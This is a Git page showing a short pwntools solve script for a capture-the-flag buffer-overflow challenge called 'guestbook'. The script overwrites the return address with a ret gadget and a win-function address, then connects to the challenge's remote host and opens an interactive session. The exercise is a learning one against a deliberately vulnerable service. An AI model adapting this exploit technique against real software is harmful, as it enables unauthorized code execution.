emln/OffSec-CTF
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
563524658109056bb3737486c1544fdfceca3c5f
OffSec-CTF/BOF/01_guestbook/solve.py
emln 5635246581 First CTFs
2026-05-09 20:58:42 +02:00

19 lines
377 B
Python
Raw Blame History

#!/usr/bin/env python3
from pwn import *
# context.binary = elf = ELF('guestbook',checksec=False)
OFFSET_TO_RIP = 72
ret = 0x40101A # ROPGadget ret
win = 0x40121B # win address (nm)
# p = process(elf.path)
p = remote("offsec.m0lecon.it", 13599)
p.recvuntil(b"name?\n")
payload = flat(
b"A" * OFFSET_TO_RIP,
p64(ret),
p64(win),
)
p.send(payload)
p.interactive()
Reference in New Issue View Git Blame Copy Permalink